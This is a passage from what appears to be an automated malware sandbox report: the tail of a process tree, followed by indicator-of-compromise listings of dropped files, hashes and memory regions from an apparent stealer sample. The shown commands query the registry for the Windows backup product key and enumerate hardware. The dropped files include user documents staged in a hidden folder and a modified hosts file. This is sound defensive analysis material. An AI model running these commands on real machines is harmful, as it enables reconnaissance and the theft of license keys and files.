                                                                                              powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
                                                                                              5⤵
                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                              PID:2184
                                                                                          • C:\Windows\system32\cmd.exe
                                                                                            C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
                                                                                            4⤵
                                                                                              PID:3548
                                                                                              • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                wmic path win32_VideoController get name
                                                                                                5⤵
                                                                                                • Detects videocard installed
                                                                                                PID:3356
                                                                                            • C:\Windows\system32\cmd.exe
                                                                                              C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
                                                                                              4⤵
                                                                                                PID:744
                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
                                                                                                  5⤵
                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                  PID:1336
                                                                                          • C:\Users\Admin\AppData\Local\Temp\v5.exe
                                                                                            "C:\Users\Admin\AppData\Local\Temp\v5.exe"
                                                                                            2⤵
                                                                                            • Executes dropped EXE
                                                                                            PID:3056

                                                                                        Network

                                                                                        MITRE ATT&CK Enterprise v15

                                                                                        Replay Monitor

                                                                                        Loading Replay Monitor...

                                                                                        Downloads

                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                                                                                          Filesize

                                                                                          2KB

                                                                                          MD5

                                                                                          440cb38dbee06645cc8b74d51f6e5f71

                                                                                          SHA1

                                                                                          d7e61da91dc4502e9ae83281b88c1e48584edb7c

                                                                                          SHA256

                                                                                          8ef7a682dfd99ff5b7e9de0e1be43f0016d68695a43c33c028af2635cc15ecfe

                                                                                          SHA512

                                                                                          3aab19578535e6ba0f6beb5690c87d970292100704209d2dcebddcdd46c6bead27588ef5d98729bfd50606a54cc1edf608b3d15bef42c13b9982aaaf15de7fd6

                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                          Filesize

                                                                                          944B

                                                                                          MD5

                                                                                          6d3e9c29fe44e90aae6ed30ccf799ca8

                                                                                          SHA1

                                                                                          c7974ef72264bbdf13a2793ccf1aed11bc565dce

                                                                                          SHA256

                                                                                          2360634e63e8f0b5748e2c56ebb8f4aa78e71008ea7b5c9ca1c49be03b49557d

                                                                                          SHA512

                                                                                          60c38c4367352537545d859f64b9c5cbada94240478d1d039fd27b5ecba4dc1c90051557c16d802269703b873546ead416279c0a80c6fd5e49ad361cef22596a

                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                          Filesize

                                                                                          944B

                                                                                          MD5

                                                                                          ef647504cf229a16d02de14a16241b90

                                                                                          SHA1

                                                                                          81480caca469857eb93c75d494828b81e124fda0

                                                                                          SHA256

                                                                                          47002672443e80410e55a0b6d683573ac27d70d803b57ee3c2818d1008669710

                                                                                          SHA512

                                                                                          a6d8c08c708eee6f7e700880ce79d2ba7cd0acbe8529d96e18f3e90ea1f3cf33fd801dd6eba6017cdd02769e968c48278c090c1deeac710124f79423cd862ee1

                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                          Filesize

                                                                                          1KB

                                                                                          MD5

                                                                                          d4154a892a07b07da27746ed39e8ef5d

                                                                                          SHA1

                                                                                          f45db8a86dd4ff4a76c1929d946507db8594d6a5

                                                                                          SHA256

                                                                                          3ea93c6f19fb845797177d3a4513108e58a2d23def933f68f70fdc7300cbf759

                                                                                          SHA512

                                                                                          57405365db52735ba3a989bdab9281c2c5a835cc938b89831b328412b7f563396966ae4d9a5f187d81ec08b7aa287b2facbf732ed156ad29e246b0e71a7f2245

                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                          Filesize

                                                                                          1KB

                                                                                          MD5

                                                                                          276798eeb29a49dc6e199768bc9c2e71

                                                                                          SHA1

                                                                                          5fdc8ccb897ac2df7476fbb07517aca5b7a6205b

                                                                                          SHA256

                                                                                          cd0a1056e8f1b6cb5cb328532239d802f4e2aa8f8fcdc0fcb487684bd68e0dcc

                                                                                          SHA512

                                                                                          0d34fce64bbefc57d64fa6e03ca886952263d5f24df9c1c4cce6a1e8f5a47a9a21e9820f8d38caa7f7b43a52336ce00b738ea18419aaa7c788b72e04ce19e4f2

                                                                                        • C:\Users\Admin\AppData\Local\Temp\Built.exe

                                                                                          Filesize

                                                                                          7.4MB

                                                                                          MD5

                                                                                          2c628deb80a8e0564ab2880b28e18af1

                                                                                          SHA1

                                                                                          733f8d93a98fb60ce981de24deb7928fc2848e8d

                                                                                          SHA256

                                                                                          b1b3013a32c2d73a5144e0371065a91d04b8a3b227eaf3de75bf41078d903188

                                                                                          SHA512

                                                                                          8d75e415a11863bee4763b572729d8090a63fa9487550b45a28ba2723cb410735a5cf7e9dc5a3cf857bb0bddb3e7775cca018b4df2d78e77c2e5477fb3509054

                                                                                        • C:\Users\Admin\AppData\Local\Temp\RES50A0.tmp

                                                                                          Filesize

                                                                                          1KB

                                                                                          MD5

                                                                                          9fd23f78bbf162642af93f2eea390886

                                                                                          SHA1

                                                                                          2b8c8e88204ecc45d4fb4bf9ea1ffac6591d39c2

                                                                                          SHA256

                                                                                          47b46fa8ad91e6e6b9aeddc91ea91360d4cdb8a681faaab5169dfb78f84368fe

                                                                                          SHA512

                                                                                          39171074d445cc007e5302d3b2b80b48bead27c4fe0326a918ed738b8d5acf77abfeadaaae32699561a8e4aee0e5454618ab76bb3367a7383c0b30d4cf02855c

                                                                                        • C:\Users\Admin\AppData\Local\Temp\_MEI12402\VCRUNTIME140.dll

                                                                                          Filesize

                                                                                          116KB

                                                                                          MD5

                                                                                          be8dbe2dc77ebe7f88f910c61aec691a

                                                                                          SHA1

                                                                                          a19f08bb2b1c1de5bb61daf9f2304531321e0e40

                                                                                          SHA256

                                                                                          4d292623516f65c80482081e62d5dadb759dc16e851de5db24c3cbb57b87db83

                                                                                          SHA512

                                                                                          0da644472b374f1da449a06623983d0477405b5229e386accadb154b43b8b083ee89f07c3f04d2c0c7501ead99ad95aecaa5873ff34c5eeb833285b598d5a655

                                                                                        • C:\Users\Admin\AppData\Local\Temp\_MEI12402\_bz2.pyd

                                                                                          Filesize

                                                                                          48KB

                                                                                          MD5

                                                                                          3bd0dd2ed98fca486ec23c42a12978a8

                                                                                          SHA1

                                                                                          63df559f4f1a96eb84028dc06eaeb0ef43551acd

                                                                                          SHA256

                                                                                          6beb733f2e27d25617d880559299fbebd6a9dac51d6a9d0ab14ae6df9877da07

                                                                                          SHA512

                                                                                          9ffa7da0e57d98b8fd6b71bc5984118ea0b23bf11ea3f377dabb45b42f2c8757216bc38ddd05b50c0bc1c69c23754319cef9ffc662d4199f7c7e038a0fb18254

                                                                                        • C:\Users\Admin\AppData\Local\Temp\_MEI12402\_ctypes.pyd

                                                                                          Filesize

                                                                                          58KB

                                                                                          MD5

                                                                                          343e1a85da03e0f80137719d48babc0f

                                                                                          SHA1

                                                                                          0702ba134b21881737585f40a5ddc9be788bab52

                                                                                          SHA256

                                                                                          7b68a4ba895d7bf605a4571d093ae3190eac5e813a9eb131285ae74161d6d664

                                                                                          SHA512

                                                                                          1b29efad26c0a536352bf8bb176a7fe9294e616cafb844c6d861561e59fbda35e1f7c510b42e8ed375561a5e1d2392b42f6021acc43133a27ae4b7006e465ba8

                                                                                        • C:\Users\Admin\AppData\Local\Temp\_MEI12402\_decimal.pyd

                                                                                          Filesize

                                                                                          107KB

                                                                                          MD5

                                                                                          8b623d42698bf8a7602243b4be1f775d

                                                                                          SHA1

                                                                                          f9116f4786b5687a03c75d960150726843e1bc25

                                                                                          SHA256

                                                                                          7c2f0a65e38179170dc69e1958e7d21e552eca46fcf62bbb842b4f951a86156c

                                                                                          SHA512

                                                                                          aa1b497629d7e57b960e4b0ab1ea3c28148e2d8ebd02905e89b365f508b945a49aacfbd032792101668a32f8666f8c4ef738de7562979b7cf89e0211614fa21a

                                                                                        • C:\Users\Admin\AppData\Local\Temp\_MEI12402\_hashlib.pyd

                                                                                          Filesize

                                                                                          35KB

                                                                                          MD5

                                                                                          d71df4f6e94bea5e57c267395ad2a172

                                                                                          SHA1

                                                                                          5c82bca6f2ce00c80e6fe885a651b404052ac7d0

                                                                                          SHA256

                                                                                          8bc92b5a6c1e1c613027c8f639cd8f9f1218fc4f7d5526cfcb9c517a2e9e14c2

                                                                                          SHA512

                                                                                          e794d9ae16f9a2b0c52e0f9c390d967ba3287523190d98279254126db907ba0e5e87e5525560273798cc9f32640c33c8d9f825ff473524d91b664fe91e125549

                                                                                        • C:\Users\Admin\AppData\Local\Temp\_MEI12402\_lzma.pyd

                                                                                          Filesize

                                                                                          86KB

                                                                                          MD5

                                                                                          932147ac29c593eb9e5244b67cf389bb

                                                                                          SHA1

                                                                                          3584ff40ab9aac1e557a6a6009d10f6835052cde

                                                                                          SHA256

                                                                                          bde9bccb972d356b8de2dc49a4d21d1b2f9711bbc53c9b9f678b66f16ca4c5d3

                                                                                          SHA512

                                                                                          6e36b8d8c6dc57a0871f0087757749c843ee12800a451185856a959160f860402aa16821c4ea659ea43be2c44fcdb4df5c0f889c21440aceb9ee1bc57373263c

                                                                                        • C:\Users\Admin\AppData\Local\Temp\_MEI12402\_queue.pyd

                                                                                          Filesize

                                                                                          25KB

                                                                                          MD5

                                                                                          0e5997263833ce8ce8a6a0ec35982a37

                                                                                          SHA1

                                                                                          96372353f71aaa56b32030bb5f5dd5c29b854d50

                                                                                          SHA256

                                                                                          0489700a866dddfa50d6ee289f7cca22c6dced9fa96541b45a04dc2ffb97122e

                                                                                          SHA512

                                                                                          a00a667cc1bbd40befe747fbbc10f130dc5d03b777cbe244080498e75a952c17d80db86aa35f37b14640ed20ef21188ea99f3945553538e61797b575297c873f

                                                                                        • C:\Users\Admin\AppData\Local\Temp\_MEI12402\_socket.pyd

                                                                                          Filesize

                                                                                          43KB

                                                                                          MD5

                                                                                          2957b2d82521ed0198851d12ed567746

                                                                                          SHA1

                                                                                          ad5fd781490ee9b1ad2dd03e74f0779fb5f9afc2

                                                                                          SHA256

                                                                                          1e97a62f4f768fa75bac47bba09928d79b74d84711b6488905f8429cd46f94a2

                                                                                          SHA512

                                                                                          b557cf3fe6c0cc188c6acc0a43b44f82fcf3a6454f6ed7a066d75da21bb11e08cfa180699528c39b0075f4e79b0199bb05e57526e8617036411815ab9f406d35

                                                                                        • C:\Users\Admin\AppData\Local\Temp\_MEI12402\_sqlite3.pyd

                                                                                          Filesize

                                                                                          56KB

                                                                                          MD5

                                                                                          a9d2c3cf00431d2b8c8432e8fb1feefd

                                                                                          SHA1

                                                                                          1c3e2fe22e10e1e9c320c1e6f567850fd22c710c

                                                                                          SHA256

                                                                                          aa0611c451b897d27dd16236ce723303199c6eacfc82314f342c7338b89009f3

                                                                                          SHA512

                                                                                          1b5ada1dac2ab76f49de5c8e74542e190455551dfd1dfe45c9ccc3edb34276635613dbcfadd1e5f4383a0d851c6656a7840c327f64b50b234f8fdd469a02ef73

                                                                                        • C:\Users\Admin\AppData\Local\Temp\_MEI12402\_ssl.pyd

                                                                                          Filesize

                                                                                          65KB

                                                                                          MD5

                                                                                          e5f6bff7a8c2cd5cb89f40376dad6797

                                                                                          SHA1

                                                                                          b854fd43b46a4e3390d5f9610004010e273d7f5f

                                                                                          SHA256

                                                                                          0f8493de58e70f3520e21e05d78cfd6a7fcde70d277e1874183e2a8c1d3fb7d5

                                                                                          SHA512

                                                                                          5b7e6421ad39a61dabd498bd0f7aa959a781bc82954dd1a74858edfea43be8e3afe3d0cacb272fa69dc897374e91ea7c0570161cda7cc57e878b288045ee98d9

                                                                                        • C:\Users\Admin\AppData\Local\Temp\_MEI12402\base_library.zip

                                                                                          Filesize

                                                                                          1.4MB

                                                                                          MD5

                                                                                          4b011f052728ae5007f9ec4e97a4f625

                                                                                          SHA1

                                                                                          9d940561f08104618ec9e901a9cd0cd13e8b355d

                                                                                          SHA256

                                                                                          c88cd8549debc046a980b0be3bf27956ae72dcdcf1a448e55892194752c570e6

                                                                                          SHA512

                                                                                          be405d80d78a188a563086809c372c44bcd1ccab5a472d50714f559559795a1df49437c1712e15eb0403917c7f6cfaf872d6bb0c8e4dd67a512c2c4a5ae93055

                                                                                        • C:\Users\Admin\AppData\Local\Temp\_MEI12402\blank.aes

                                                                                          Filesize

                                                                                          122KB

                                                                                          MD5

                                                                                          785ec0030d58de07e4272bcd6b8962b4

                                                                                          SHA1

                                                                                          186b6bed6737dccebe1345dfaa05bbd90300efda

                                                                                          SHA256

                                                                                          be7aaf420fa877484d1bd72477da4b313d7f5067205ae6a5f1caadc5d577e5cd

                                                                                          SHA512

                                                                                          115f0688e767e5946523eb17400885210dd5d62190a815bb23f04a591ddbc875211d55a448dc025f139a1a59b1cb5eb9a079d05d6417229098ac1b79983e9271

                                                                                        • C:\Users\Admin\AppData\Local\Temp\_MEI12402\libcrypto-3.dll

                                                                                          Filesize

                                                                                          1.6MB

                                                                                          MD5

                                                                                          7f1b899d2015164ab951d04ebb91e9ac

                                                                                          SHA1

                                                                                          1223986c8a1cbb57ef1725175986e15018cc9eab

                                                                                          SHA256

                                                                                          41201d2f29cf3bc16bf32c8cecf3b89e82fec3e5572eb38a578ae0fb0c5a2986

                                                                                          SHA512

                                                                                          ca227b6f998cacca3eb6a8f18d63f8f18633ab4b8464fb8b47caa010687a64516181ad0701c794d6bfe3f153662ea94779b4f70a5a5a94bb3066d8a011b4310d

                                                                                        • C:\Users\Admin\AppData\Local\Temp\_MEI12402\libffi-8.dll

                                                                                          Filesize

                                                                                          29KB

                                                                                          MD5

                                                                                          08b000c3d990bc018fcb91a1e175e06e

                                                                                          SHA1

                                                                                          bd0ce09bb3414d11c91316113c2becfff0862d0d

                                                                                          SHA256

                                                                                          135c772b42ba6353757a4d076ce03dbf792456143b42d25a62066da46144fece

                                                                                          SHA512

                                                                                          8820d297aeda5a5ebe1306e7664f7a95421751db60d71dc20da251bcdfdc73f3fd0b22546bd62e62d7aa44dfe702e4032fe78802fb16ee6c2583d65abc891cbf

                                                                                        • C:\Users\Admin\AppData\Local\Temp\_MEI12402\libssl-3.dll

                                                                                          Filesize

                                                                                          222KB

                                                                                          MD5

                                                                                          264be59ff04e5dcd1d020f16aab3c8cb

                                                                                          SHA1

                                                                                          2d7e186c688b34fdb4c85a3fce0beff39b15d50e

                                                                                          SHA256

                                                                                          358b59da9580e7102adfc1be9400acea18bc49474db26f2f8bacb4b8839ce49d

                                                                                          SHA512

                                                                                          9abb96549724affb2e69e5cb2c834ecea3f882f2f7392f2f8811b8b0db57c5340ab21be60f1798c7ab05f93692eb0aeab077caf7e9b7bb278ad374ff3c52d248

                                                                                        • C:\Users\Admin\AppData\Local\Temp\_MEI12402\python311.dll

                                                                                          Filesize

                                                                                          1.6MB

                                                                                          MD5

                                                                                          ccdbd8027f165575a66245f8e9d140de

                                                                                          SHA1

                                                                                          d91786422ce1f1ad35c528d1c4cd28b753a81550

                                                                                          SHA256

                                                                                          503cd34daed4f6d320731b368bbd940dbac1ff7003321a47d81d81d199cca971

                                                                                          SHA512

                                                                                          870b54e4468db682b669887aeef1ffe496f3f69b219bda2405ac502d2dcd67b6542db6190ea6774abf1db5a7db429ce8f6d2fc5e88363569f15cf4df78da2311

                                                                                        • C:\Users\Admin\AppData\Local\Temp\_MEI12402\rar.exe

                                                                                          Filesize

                                                                                          615KB

                                                                                          MD5

                                                                                          9c223575ae5b9544bc3d69ac6364f75e

                                                                                          SHA1

                                                                                          8a1cb5ee02c742e937febc57609ac312247ba386

                                                                                          SHA256

                                                                                          90341ac8dcc9ec5f9efe89945a381eb701fe15c3196f594d9d9f0f67b4fc2213

                                                                                          SHA512

                                                                                          57663e2c07b56024aaae07515ee3a56b2f5068ebb2f2dc42be95d1224376c2458da21c965aab6ae54de780cb874c2fc9de83d9089abf4536de0f50faca582d09

                                                                                        • C:\Users\Admin\AppData\Local\Temp\_MEI12402\rarreg.key

                                                                                          Filesize

                                                                                          456B

                                                                                          MD5

                                                                                          4531984cad7dacf24c086830068c4abe

                                                                                          SHA1

                                                                                          fa7c8c46677af01a83cf652ef30ba39b2aae14c3

                                                                                          SHA256

                                                                                          58209c8ab4191e834ffe2ecd003fd7a830d3650f0fd1355a74eb8a47c61d4211

                                                                                          SHA512

                                                                                          00056f471945d838ef2ce56d51c32967879fe54fcbf93a237ed85a98e27c5c8d2a39bc815b41c15caace2071edd0239d775a31d1794dc4dba49e7ecff1555122

                                                                                        • C:\Users\Admin\AppData\Local\Temp\_MEI12402\select.pyd

                                                                                          Filesize

                                                                                          25KB

                                                                                          MD5

                                                                                          e021cf8d94cc009ff79981f3472765e7

                                                                                          SHA1

                                                                                          c43d040b0e84668f3ae86acc5bd0df61be2b5374

                                                                                          SHA256

                                                                                          ab40bf48a6db6a00387aece49a03937197bc66b4450559feec72b6f74fc4d01e

                                                                                          SHA512

                                                                                          c5ca57f8e4c0983d9641412e41d18abd16fe5868d016a5c6e780543860a9d3b37cc29065799951cb13dc49637c45e02efb6b6ffeaf006e78d6ce2134eb902c67

                                                                                        • C:\Users\Admin\AppData\Local\Temp\_MEI12402\sqlite3.dll

                                                                                          Filesize

                                                                                          644KB

                                                                                          MD5

                                                                                          74b347668b4853771feb47c24e7ec99b

                                                                                          SHA1

                                                                                          21bd9ca6032f0739914429c1db3777808e4806b0

                                                                                          SHA256

                                                                                          5913eb3f3d237632c2f0d6e32ca3e993a50b348033bb6e0da8d8139d44935f9e

                                                                                          SHA512

                                                                                          463d8864ada5f21a70f8db15961a680b00ee040a41ea660432d53d0ee3ccd292e6c11c4ec52d1d848a7d846ad3caf923cbc38535754d65bbe190e095f5acb8c3

                                                                                        • C:\Users\Admin\AppData\Local\Temp\_MEI12402\unicodedata.pyd

                                                                                          Filesize

                                                                                          295KB

                                                                                          MD5

                                                                                          bc28491251d94984c8555ed959544c11

                                                                                          SHA1

                                                                                          964336b8c045bf8bb1f4d12de122cfc764df6a46

                                                                                          SHA256

                                                                                          f308681ef9c4bb4ea6adae93939466df1b51842554758cb2d003131d7558edd4

                                                                                          SHA512

                                                                                          042d072d5f73fe3cd59394fc59436167c40b4e0cf7909afcad1968e0980b726845f09bf23b4455176b12083a91141474e9e0b7d8475afb0e3de8e1e4dbad7ec0

                                                                                        • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_b0022jcj.q4j.ps1

                                                                                          Filesize

                                                                                          60B

                                                                                          MD5

                                                                                          d17fe0a3f47be24a6453e9ef58c94641

                                                                                          SHA1

                                                                                          6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                                                          SHA256

                                                                                          96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                                                          SHA512

                                                                                          5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                                                        • C:\Users\Admin\AppData\Local\Temp\l0guzk01\l0guzk01.dll

                                                                                          Filesize

                                                                                          4KB

                                                                                          MD5

                                                                                          1a22a71b6af478d14bdc56775b3b1c1e

                                                                                          SHA1

                                                                                          e71d4c29de6ce0bd8b11689a64ac04cd755537ff

                                                                                          SHA256

                                                                                          8cb49b6b2856a3e48c685a03c7b33226016206d4273e4b4cf55c0b19b72fa10e

                                                                                          SHA512

                                                                                          3df0d6bd822fbb2ee37c5b11bd6fa067beaa4a6cf2fafe5cd6148e08dec573f5eb172d7d9dc1b1d695d2fa92ec8fef536956b5d65a50da6e04bd32bb8e8dfe05

                                                                                        • C:\Users\Admin\AppData\Local\Temp\v5.exe

                                                                                          Filesize

                                                                                          4.9MB

                                                                                          MD5

                                                                                          a34c14e2f897e79948a262f029151e10

                                                                                          SHA1

                                                                                          27b9a47659398040f467d991775dd7d3113e962b

                                                                                          SHA256

                                                                                          40a7ceacbb6126a54eee26b10b2f66246c27c3891810998139367019286f6a63

                                                                                          SHA512

                                                                                          05bf31cd249416035e670ae7c473a7219a021a3aa87502ac52ead33804688731117a9eebfe1e7e53a85f02fe0a072e02707a4b4d94eaef090fe13cd741191812

                                                                                        • C:\Users\Admin\AppData\Local\Temp\‎​        \Common Files\Desktop\EnterConnect.docx

                                                                                          Filesize

                                                                                          352KB

                                                                                          MD5

                                                                                          d22d33095576251824e8b57f16e20ae5

                                                                                          SHA1

                                                                                          99222e3a8e81c89e44c2973b4ca8d1f1669a922b

                                                                                          SHA256

                                                                                          c2e051d2248ff34dc4a838db5a4639f1496e2141996e6c5da3a2427bc5c4a049

                                                                                          SHA512

                                                                                          0dd31336fa7865e6af3b69ff2c3e9a791c522c4a6dbded0d4cedd0708128a83ac555b7808da0997ab2f67a401dfb0845b29dac121dce2bcf6b6e7c0f39f28315

                                                                                        • C:\Users\Admin\AppData\Local\Temp\‎​        \Common Files\Desktop\ResolveRedo.mp3

                                                                                          Filesize

                                                                                          664KB

                                                                                          MD5

                                                                                          df4c3d42c84c2eb7ac710b971cb303b4

                                                                                          SHA1

                                                                                          cc183bdd617e55360821f798fc4adc084ea1ce1e

                                                                                          SHA256

                                                                                          82081519e47c200d7988ac8a5b63ba7b709f930eb3cb890ed4868c95c3d44c8d

                                                                                          SHA512

                                                                                          f2a76baefc7e053e311fad3559d47c4dbb9cec8a5213dd06c52160e1d8433aa6fe1102e20504487b7962ddee7d32872dbad5b42e9f47a30bcc84ff8ee46eb264

                                                                                        • C:\Users\Admin\AppData\Local\Temp\‎​        \Common Files\Desktop\RestoreFormat.png

                                                                                          Filesize

                                                                                          919KB

                                                                                          MD5

                                                                                          07fb2500b59e15336e96b3b1ef012083

                                                                                          SHA1

                                                                                          72c408881beb358cef6ef27da8c3f0d290251114

                                                                                          SHA256

                                                                                          9b933736e516f11b92ed65cbf034f588c2e8d38c8c8d9f73789945689dd4ed0e

                                                                                          SHA512

                                                                                          252287df1f0fc3471e331c910c5eb6f43bc910d211cdfcbdbf10e5887c55ee27f4bc6e1d37ecce3bc0e151c0902275268be781d0812a6394e07c2ae3bcb1accd

                                                                                        • C:\Users\Admin\AppData\Local\Temp\‎​        \Common Files\Documents\Are.docx

                                                                                          Filesize

                                                                                          11KB

                                                                                          MD5

                                                                                          a33e5b189842c5867f46566bdbf7a095

                                                                                          SHA1

                                                                                          e1c06359f6a76da90d19e8fd95e79c832edb3196

                                                                                          SHA256

                                                                                          5abf8e3d1f78de7b09d7f6fb87f9e80e60caacf13ef3c1289665653dacd7c454

                                                                                          SHA512

                                                                                          f2ad3812ec9b915e9618539b0f103f2e9acaad25fbbacd84941c954ce070af231324e83a4621e951c1dbae8d40d50410954e40dd52bbd46e34c54b0d1957407b

                                                                                        • C:\Users\Admin\AppData\Local\Temp\‎​        \Common Files\Documents\Files.docx

                                                                                          Filesize

                                                                                          11KB

                                                                                          MD5

                                                                                          4a8fbd593a733fc669169d614021185b

                                                                                          SHA1

                                                                                          166e66575715d4c52bcb471c09bdbc5a9bb2f615

                                                                                          SHA256

                                                                                          714cd32f8edacb3befbfc4b17db5b6eb05c2c8936e3bae14ea25a6050d88ae42

                                                                                          SHA512

                                                                                          6b2ebbbc34cd821fd9b3d7711d9cdadd8736412227e191883e5df19068f8118b7c80248eb61cc0a2f785a4153871a6003d79de934254b2c74c33b284c507a33b

                                                                                        • C:\Users\Admin\AppData\Local\Temp\‎​        \Common Files\Documents\Opened.docx

                                                                                          Filesize

                                                                                          11KB

                                                                                          MD5

                                                                                          bfbc1a403197ac8cfc95638c2da2cf0e

                                                                                          SHA1

                                                                                          634658f4dd9747e87fa540f5ba47e218acfc8af2

                                                                                          SHA256

                                                                                          272ed278e82c84cf4f80f48ec7989e1fc35f2055d6d05b63c8a31880846597a6

                                                                                          SHA512

                                                                                          b8938526fcbf7152805aec130ca553e3ec949cb825430a5d0a25c90ec5eb0863857010484a4b31fdc4bb65a4c92ad7127c812b93114be4569a677f60debe43b1

                                                                                        • C:\Users\Admin\AppData\Local\Temp\‎​        \Common Files\Documents\Recently.docx

                                                                                          Filesize

                                                                                          11KB

                                                                                          MD5

                                                                                          3b068f508d40eb8258ff0b0592ca1f9c

                                                                                          SHA1

                                                                                          59ac025c3256e9c6c86165082974fe791ff9833a

                                                                                          SHA256

                                                                                          07db44a8d6c3a512b15f1cb7262a2d7e4b63ced2130bc9228515431699191cc7

                                                                                          SHA512

                                                                                          e29624bc8fecb0e2a9d917642375bd97b42502e5f23812195a61a4920cae5b6ed540e74dfcf8432dcceb7de906ad0501cdd68056f9b0ec86a6bb0c1e336bfe32

                                                                                        • C:\Windows\System32\drivers\etc\hosts

                                                                                          Filesize

                                                                                          2KB

                                                                                          MD5

                                                                                          f99e42cdd8b2f9f1a3c062fe9cf6e131

                                                                                          SHA1

                                                                                          e32bdcab8da0e3cdafb6e3876763cee002ab7307

                                                                                          SHA256

                                                                                          a040d43136f2f4c41a4875f895060fb910267f2ffad2e3b1991b15c92f53e0f0

                                                                                          SHA512

                                                                                          c55a5e440326c59099615b21d0948cdc2a42bd9cf5990ec88f69187fa540d8c2e91aebe6a25ed8359a47be29d42357fec4bd987ca7fae0f1a6b6db18e1c320a6

                                                                                        • \??\c:\Users\Admin\AppData\Local\Temp\l0guzk01\CSCD89D273246DB42EB8F3464DE88C2A475.TMP

                                                                                          Filesize

                                                                                          652B

                                                                                          MD5

                                                                                          bed418bbda7f183223a6ab699bd39313

                                                                                          SHA1

                                                                                          31cb56198cd5e62f16dce0b49f3c38eddcf7ffd0

                                                                                          SHA256

                                                                                          92725125dd5657393145e96a6e0857fbaa8fec5e83315ec93581da1cb0948162

                                                                                          SHA512

                                                                                          10f3535c7868cd821449848e7fe6b3417707d92e9d5e0f953035200de00bba89f929b3e202815c47cb2c83efef640301382c64193896319d8d4488787b7ebc4b

                                                                                        • \??\c:\Users\Admin\AppData\Local\Temp\l0guzk01\l0guzk01.0.cs

                                                                                          Filesize

                                                                                          1004B

                                                                                          MD5

                                                                                          c76055a0388b713a1eabe16130684dc3

                                                                                          SHA1

                                                                                          ee11e84cf41d8a43340f7102e17660072906c402

                                                                                          SHA256

                                                                                          8a3cd008e86a3d835f55f8415f5fd264c6dacdf0b7286e6854ea3f5a363390e7

                                                                                          SHA512

                                                                                          22d2804491d90b03bb4b640cb5e2a37d57766c6d82caf993770dcf2cf97d0f07493c870761f3ecea15531bd434b780e13ae065a1606681b32a77dbf6906fb4e2

                                                                                        • \??\c:\Users\Admin\AppData\Local\Temp\l0guzk01\l0guzk01.cmdline

                                                                                          Filesize

                                                                                          607B

                                                                                          MD5

                                                                                          7777ec74db899718ede543b6b09f9843

                                                                                          SHA1

                                                                                          7fd9af79fb67f19e387432752b8e3fe38b784433

                                                                                          SHA256

                                                                                          96b81f3e62b44b569ee703a3bbd7a04c5d4480aeabc95eebfcd69bcd12ab7cbe

                                                                                          SHA512

                                                                                          3cdb455ecae43bf73706fd97b9915234e5c5c6df8c8632369dc451d5b226062aaf8487f22eedec9d1415aa472d35a43ce5da2d2802375ad873e0e27121f48dbf

                                                                                        • memory/2444-90-0x00007FFF59DB0000-0x00007FFF59DBD000-memory.dmp

                                                                                          Filesize

                                                                                          52KB

                                                                                        • memory/2444-360-0x00007FFF45060000-0x00007FFF4517C000-memory.dmp

                                                                                          Filesize

                                                                                          1.1MB

                                                                                        • memory/2444-376-0x00007FFF59F40000-0x00007FFF59F64000-memory.dmp

                                                                                          Filesize

                                                                                          144KB

                                                                                        • memory/2444-92-0x00007FFF456B0000-0x00007FFF4577D000-memory.dmp

                                                                                          Filesize

                                                                                          820KB

                                                                                        • memory/2444-96-0x00007FFF505F0000-0x00007FFF50604000-memory.dmp

                                                                                          Filesize

                                                                                          80KB

                                                                                        • memory/2444-99-0x00007FFF58D80000-0x00007FFF58D8D000-memory.dmp

                                                                                          Filesize

                                                                                          52KB

                                                                                        • memory/2444-100-0x00007FFF45060000-0x00007FFF4517C000-memory.dmp

                                                                                          Filesize

                                                                                          1.1MB

                                                                                        • memory/2444-70-0x00007FFF5E4A0000-0x00007FFF5E4AF000-memory.dmp

                                                                                          Filesize

                                                                                          60KB

                                                                                        • memory/2444-94-0x0000027F60800000-0x0000027F60D29000-memory.dmp

                                                                                          Filesize

                                                                                          5.2MB

                                                                                        • memory/2444-372-0x00007FFF45180000-0x00007FFF456A9000-memory.dmp

                                                                                          Filesize

                                                                                          5.2MB

                                                                                        • memory/2444-46-0x00007FFF45BB0000-0x00007FFF461A2000-memory.dmp

                                                                                          Filesize

                                                                                          5.9MB

                                                                                        • memory/2444-93-0x00007FFF45180000-0x00007FFF456A9000-memory.dmp

                                                                                          Filesize

                                                                                          5.2MB

                                                                                        • memory/2444-314-0x00007FFF59F40000-0x00007FFF59F64000-memory.dmp

                                                                                          Filesize

                                                                                          144KB

                                                                                        • memory/2444-91-0x00007FFF54E40000-0x00007FFF54E73000-memory.dmp

                                                                                          Filesize

                                                                                          204KB

                                                                                        • memory/2444-89-0x00007FFF54E80000-0x00007FFF54E99000-memory.dmp

                                                                                          Filesize

                                                                                          100KB

                                                                                        • memory/2444-82-0x00007FFF45780000-0x00007FFF458FE000-memory.dmp

                                                                                          Filesize

                                                                                          1.5MB

